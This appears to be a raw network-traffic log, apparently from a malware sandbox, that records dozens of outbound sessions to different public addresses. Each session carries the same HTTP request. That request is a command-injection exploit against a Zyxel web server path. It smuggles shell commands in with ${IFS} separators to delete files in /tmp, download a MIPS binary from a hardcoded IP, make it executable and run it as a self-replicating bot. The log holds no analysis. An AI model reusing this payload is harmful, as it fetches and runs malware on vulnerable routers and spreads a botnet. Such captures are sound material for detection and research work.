                                                Jan 12, 2024 18:16:28.574222088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5639192.168.2.2336170166.165.3.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574292898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5640192.168.2.2343682191.217.68.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574350119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5641192.168.2.234562469.174.35.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574414015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5642192.168.2.2337076159.42.108.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574474096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5643192.168.2.2338012175.57.74.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574525118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5644192.168.2.2333252109.243.79.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574587107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5645192.168.2.233889293.148.11.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574647903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5646192.168.2.2358132187.218.11.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574697018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5647192.168.2.2340438178.9.32.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574779034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5648192.168.2.2345936104.51.108.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574835062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5649192.168.2.234933469.45.229.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574887991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5650192.168.2.2349176117.200.52.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.574950933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5651192.168.2.2342044223.205.168.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575009108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5652192.168.2.2357542137.172.4.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575068951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5653192.168.2.2346134201.0.203.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575131893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5654192.168.2.2358856217.217.199.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575189114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5655192.168.2.236054677.233.58.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575253963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5656192.168.2.2342466154.153.83.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575320005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5657192.168.2.2339532193.168.0.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575406075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5658192.168.2.234016675.150.207.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575460911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5659192.168.2.2334126162.138.203.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575527906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5660192.168.2.2347718134.126.174.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575572968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5661192.168.2.234838236.112.206.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575647116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5662192.168.2.2357306213.240.184.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575710058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5663192.168.2.2358310104.6.50.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575769901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5664192.168.2.2337582168.63.154.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575835943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5665192.168.2.2337886154.89.167.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575891018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5666192.168.2.2346926149.11.13.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.575939894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5667192.168.2.2360418140.232.70.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576005936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5668192.168.2.234356640.150.138.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576059103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5669192.168.2.2342404181.43.9.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576103926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5670192.168.2.23352165.88.8.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576178074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5671192.168.2.2360498175.112.104.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576251030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5672192.168.2.233957213.178.60.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576313019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5673192.168.2.235065240.74.65.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576380014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5674192.168.2.233397081.196.208.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576442003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5675192.168.2.235938492.54.205.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576508045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5676192.168.2.2338200125.51.56.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576587915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5677192.168.2.234125437.182.201.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576637030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5678192.168.2.235022634.112.39.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576698065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5679192.168.2.2339538209.246.227.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576754093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5680192.168.2.2349710184.236.33.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576821089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5681192.168.2.2358304191.241.245.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576873064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5682192.168.2.2360444117.49.139.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576939106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5683192.168.2.2337228169.5.125.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.576989889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5684192.168.2.2351286140.69.135.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577079058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5685192.168.2.235839072.106.228.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577122927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5686192.168.2.23431388.181.58.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577187061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5687192.168.2.235207479.60.80.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577250004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5688192.168.2.2338104174.114.172.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577303886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5689192.168.2.235150288.49.143.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577372074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5690192.168.2.2338812116.58.16.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577440977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5691192.168.2.2338828221.97.175.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577500105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5692192.168.2.2351908165.117.225.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577568054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5693192.168.2.2352904204.162.23.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577630997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5694192.168.2.2349570181.101.234.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577692986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5695192.168.2.233983071.222.128.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577764988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5696192.168.2.2334662105.10.129.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577816010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5697192.168.2.2359630150.0.185.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577889919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5698192.168.2.2345082100.13.197.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.577938080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5699192.168.2.2341282133.220.235.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578003883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5700192.168.2.2358132159.129.26.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:28.578063011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5701192.168.2.2340996116.195.97.206443
                                                TimestampBytes transferredDirectionData
